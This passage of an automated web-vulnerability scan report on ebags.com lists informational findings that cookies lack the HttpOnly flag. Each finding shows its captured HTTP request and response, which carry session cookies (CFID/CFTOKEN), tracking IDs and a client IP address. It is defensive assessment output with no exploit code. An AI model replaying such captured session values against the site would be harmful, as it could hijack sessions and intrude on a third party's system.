<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.3. http://www.ebags.com/blocks/ajax/certonaajax.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/ajax/certonaajax.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blocks/ajax/certonaajax.cfm?type=productDetail&modelid=120830&_=1293371745972 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SOURCEID=BECOME01%24COUPONID%3D40959822; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; ACCT=guest; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 26 Dec 2010 13:56:03 GMT
Content-Type: text/json; charset=utf-8
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:56:03 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 53

{ "AlsoViewed" : " ", "OtherRecommendations" : " " }

3.4. http://www.ebags.com/blocks/ajax/persistentCart.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/ajax/persistentCart.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /blocks/ajax/persistentCart.cfm HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822
Origin: http://www.ebags.com
X-Requested-With: XMLHttpRequest
Content-Type: application/xml
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_cc=true; s_campaign=BEC; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; ACCT=guest; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbDomTm=0; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; __cmbTpvTm=1807; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":1,"to":3,"c":"http://www.ebags.com/product/case-logic/sony-psp-game-case/120830","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}
Content-Length: 0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 26 Dec 2010 13:58:50 GMT
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:58:50 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 106


<script>
eBags.microCart.originalCartItemCount = 0;
eBags.microCart.cartItemCount = 0;
</script>

3.5. http://www.ebags.com/blocks/ajax/productEDD.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/ajax/productEDD.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blocks/ajax/productEDD.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:24 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D409598226342D8A3CFF649EABBA3DA7F; expires=Sun, 02-Jan-2011 14:02:24 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 8



3.6. http://www.ebags.com/blocks/dsp_non_discountable_brands.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/dsp_non_discountable_brands.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blocks/dsp_non_discountable_brands.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:14 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=6342D8A3A72905B3C84F9D85; expires=Sun, 02-Jan-2011 14:02:14 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 36836


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<script language="javascript">
function redir(site)
{
window.opener.location.href = site;
window.close()
}
function
...[SNIP]...

3.7. http://www.ebags.com/blocks/dsp_prop65.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/dsp_prop65.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blocks/dsp_prop65.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:17 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=6342D8A3A72905B3C84F9D85; expires=Sun, 02-Jan-2011 14:02:17 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 5437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<script language="javascript">
function redir(site)
{
window.opener.location.href = site;
window.close()
}
function
...[SNIP]...

3.8. http://www.ebags.com/brand/athalon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/athalon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/athalon HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:13:24 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: /index.cfm?Brand_10296_Not_Active_Link=yes
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:24 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1174

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.cfm%3fBrand_10296_Not_Active_Link%3dyes">here</a>.</h2>
</body></html>
<!-- Omniture Error: System.NullRef
...[SNIP]...

3.9. http://www.ebags.com/brand/bosca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/bosca

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/bosca HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:12:59 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:12:59 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 116663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.10. http://www.ebags.com/brand/burton  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/burton

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/burton HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.11. http://www.ebags.com/brand/eagle-creek  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/eagle-creek

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/eagle-creek HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:12:41 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:12:41 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 122990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.12. http://www.ebags.com/brand/fleurville  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/fleurville

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/fleurville HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:40 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:40 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 62446


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.13. http://www.ebags.com/brand/hobo-international  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/hobo-international

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/hobo-international HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:20 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:20 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 52206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.14. http://www.ebags.com/brand/hurley  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/hurley

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/hurley HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 83654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.15. http://www.ebags.com/brand/ju-ju-be  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/ju-ju-be

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/ju-ju-be HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:44 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:44 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 68446


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

